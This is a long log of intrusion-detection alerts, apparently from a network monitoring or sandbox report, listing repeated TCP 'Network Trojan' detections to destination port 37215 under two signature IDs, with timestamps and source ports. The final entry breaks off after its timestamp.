          Timestamp:06/08/24-15:05:24.352751
          SID:2829579
          Source Port:55882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670205
          SID:2835222
          Source Port:49328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884376
          SID:2829579
          Source Port:34908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.518026
          SID:2835222
          Source Port:60134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792757
          SID:2835222
          Source Port:60852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035569
          SID:2835222
          Source Port:41498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350986
          SID:2829579
          Source Port:57764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241361
          SID:2829579
          Source Port:33156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602964
          SID:2829579
          Source Port:50378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.085000
          SID:2835222
          Source Port:59142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829370
          SID:2829579
          Source Port:53440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795726
          SID:2829579
          Source Port:49622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188169
          SID:2829579
          Source Port:58856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857181
          SID:2835222
          Source Port:33736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036262
          SID:2829579
          Source Port:39472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017342
          SID:2829579
          Source Port:46374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276560
          SID:2835222
          Source Port:39076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.518446
          SID:2835222
          Source Port:46318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274496
          SID:2829579
          Source Port:36708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783375
          SID:2829579
          Source Port:43406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264830
          SID:2835222
          Source Port:53668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175298
          SID:2829579
          Source Port:53850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892800
          SID:2835222
          Source Port:34604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855478
          SID:2835222
          Source Port:53054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542412
          SID:2835222
          Source Port:36310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891491
          SID:2829579
          Source Port:57028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.243021
          SID:2829579
          Source Port:40868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272841
          SID:2835222
          Source Port:57974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734988
          SID:2829579
          Source Port:51566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262249
          SID:2829579
          Source Port:60176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040254
          SID:2835222
          Source Port:54628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.674457
          SID:2829579
          Source Port:49294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057868
          SID:2829579
          Source Port:50300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.099474
          SID:2829579
          Source Port:46096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.883832
          SID:2829579
          Source Port:52186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405459
          SID:2835222
          Source Port:40604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132060
          SID:2829579
          Source Port:56836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471212
          SID:2829579
          Source Port:34024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258039
          SID:2829579
          Source Port:54026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.078849
          SID:2835222
          Source Port:58358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897915
          SID:2835222
          Source Port:60970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159525
          SID:2835222
          Source Port:39414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746287
          SID:2829579
          Source Port:44924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237213
          SID:2835222
          Source Port:50532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600000
          SID:2835222
          Source Port:47308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542710
          SID:2829579
          Source Port:59908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.116866
          SID:2835222
          Source Port:34412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150551
          SID:2835222
          Source Port:45326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787824
          SID:2835222
          Source Port:53784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599214
          SID:2829579
          Source Port:40046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161785
          SID:2835222
          Source Port:41502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513621
          SID:2829579
          Source Port:55048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.496112
          SID:2835222
          Source Port:59350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155800
          SID:2829579
          Source Port:54304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742056
          SID:2835222
          Source Port:57836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.296774
          SID:2835222
          Source Port:58754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897299
          SID:2829579
          Source Port:58696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747274
          SID:2835222
          Source Port:51518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729190
          SID:2829579
          Source Port:46346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744370
          SID:2829579
          Source Port:49178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739455
          SID:2829579
          Source Port:48480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.079765
          SID:2835222
          Source Port:48712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449970
          SID:2835222
          Source Port:35470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113604
          SID:2829579
          Source Port:50550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036589
          SID:2829579
          Source Port:44352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669668
          SID:2835222
          Source Port:48556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409455
          SID:2835222
          Source Port:53722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.024812
          SID:2835222
          Source Port:37844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464786
          SID:2835222
          Source Port:50738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808095
          SID:2835222
          Source Port:43758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805786
          SID:2829579
          Source Port:53418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745102
          SID:2835222
          Source Port:37254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855279
          SID:2829579
          Source Port:48050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155921
          SID:2829579
          Source Port:58984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058154
          SID:2835222
          Source Port:57786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744596
          SID:2829579
          Source Port:43142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150411
          SID:2835222
          Source Port:46688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517568
          SID:2829579
          Source Port:43304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729694
          SID:2835222
          Source Port:38512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896640
          SID:2829579
          Source Port:51344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842382
          SID:2835222
          Source Port:50440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.883863
          SID:2835222
          Source Port:47506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511056
          SID:2829579
          Source Port:47206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258730
          SID:2829579
          Source Port:42934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160164
          SID:2829579
          Source Port:43768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463153
          SID:2829579
          Source Port:37432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462555
          SID:2835222
          Source Port:37796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114387
          SID:2829579
          Source Port:51646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511459
          SID:2829579
          Source Port:59200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160343
          SID:2829579
          Source Port:48080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857206
          SID:2835222
          Source Port:55638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075593
          SID:2835222
          Source Port:53316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233501
          SID:2829579
          Source Port:53916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705099
          SID:2835222
          Source Port:51200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276524
          SID:2835222
          Source Port:39434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067806
          SID:2829579
          Source Port:38886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799842
          SID:2829579
          Source Port:47518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465288
          SID:2835222
          Source Port:37212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302874
          SID:2835222
          Source Port:46614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509530
          SID:2835222
          Source Port:39512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912404
          SID:2829579
          Source Port:53150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351200
          SID:2829579
          Source Port:55752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787757
          SID:2829579
          Source Port:45774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261169
          SID:2829579
          Source Port:59770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407915
          SID:2835222
          Source Port:37634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020786
          SID:2835222
          Source Port:50620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155548
          SID:2835222
          Source Port:59750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019813
          SID:2835222
          Source Port:57376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259683
          SID:2835222
          Source Port:40190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893430
          SID:2829579
          Source Port:36446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152716
          SID:2829579
          Source Port:36866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468709
          SID:2829579
          Source Port:59058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465491
          SID:2829579
          Source Port:51392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799640
          SID:2835222
          Source Port:41948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446751
          SID:2835222
          Source Port:50482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188329
          SID:2829579
          Source Port:49052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440808
          SID:2829579
          Source Port:37410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739389
          SID:2835222
          Source Port:51834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110667
          SID:2835222
          Source Port:54672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516383
          SID:2835222
          Source Port:48680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067846
          SID:2829579
          Source Port:43830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.022143
          SID:2829579
          Source Port:41172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409754
          SID:2829579
          Source Port:58666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901876
          SID:2835222
          Source Port:37476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780359
          SID:2835222
          Source Port:42430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150635
          SID:2829579
          Source Port:57646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272334
          SID:2835222
          Source Port:36818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731893
          SID:2835222
          Source Port:59806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670009
          SID:2829579
          Source Port:57020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175406
          SID:2835222
          Source Port:57948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175005
          SID:2829579
          Source Port:60596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545374
          SID:2835222
          Source Port:39338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740379
          SID:2835222
          Source Port:50138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112321
          SID:2829579
          Source Port:60920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733704
          SID:2835222
          Source Port:43926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135620
          SID:2835222
          Source Port:39300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896797
          SID:2829579
          Source Port:41508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730255
          SID:2829579
          Source Port:47380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.111599
          SID:2829579
          Source Port:51738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081788
          SID:2829579
          Source Port:46652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887418
          SID:2829579
          Source Port:46322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071373
          SID:2835222
          Source Port:53786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448784
          SID:2829579
          Source Port:37964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039567
          SID:2835222
          Source Port:57748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.099488
          SID:2835222
          Source Port:33132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601680
          SID:2829579
          Source Port:56486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548675
          SID:2829579
          Source Port:50502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740141
          SID:2835222
          Source Port:35664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108497
          SID:2835222
          Source Port:43266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792725
          SID:2829579
          Source Port:39490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812726
          SID:2829579
          Source Port:54746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517468
          SID:2835222
          Source Port:57472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601477
          SID:2835222
          Source Port:33172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403256
          SID:2829579
          Source Port:46754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897142
          SID:2835222
          Source Port:34120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465491
          SID:2829579
          Source Port:56708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276699
          SID:2829579
          Source Port:45400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043684
          SID:2829579
          Source Port:45716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552072
          SID:2835222
          Source Port:47228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747757
          SID:2835222
          Source Port:36844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793475
          SID:2835222
          Source Port:40338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466058
          SID:2829579
          Source Port:50472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128646
          SID:2829579
          Source Port:44834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792624
          SID:2835222
          Source Port:36924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887344
          SID:2835222
          Source Port:58054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.084763
          SID:2829579
          Source Port:33038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672407
          SID:2829579
          Source Port:36504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509799
          SID:2835222
          Source Port:35770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743603
          SID:2835222
          Source Port:43868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805006
          SID:2835222
          Source Port:56380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.899254
          SID:2835222
          Source Port:33098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706984
          SID:2829579
          Source Port:34358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267918
          SID:2835222
          Source Port:45850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542374
          SID:2829579
          Source Port:57756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160422
          SID:2829579
          Source Port:58140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813152
          SID:2835222
          Source Port:35490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791672
          SID:2835222
          Source Port:40660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180912
          SID:2829579
          Source Port:52400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467594
          SID:2829579
          Source Port:45930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442416
          SID:2835222
          Source Port:56504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792246
          SID:2829579
          Source Port:53618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747451
          SID:2835222
          Source Port:42492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781255
          SID:2835222
          Source Port:36010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546646
          SID:2835222
          Source Port:60258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813001
          SID:2835222
          Source Port:57394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159100
          SID:2829579
          Source Port:54536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672869
          SID:2829579
          Source Port:47574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.794765
          SID:2835222
          Source Port:59018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274513
          SID:2829579
          Source Port:36374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670116
          SID:2829579
          Source Port:39104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257962
          SID:2835222
          Source Port:47946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786347
          SID:2829579
          Source Port:33474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792065
          SID:2829579
          Source Port:57096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151302
          SID:2835222
          Source Port:54332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731676
          SID:2835222
          Source Port:40042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130115
          SID:2829579
          Source Port:34198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.243462
          SID:2835222
          Source Port:48906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258689
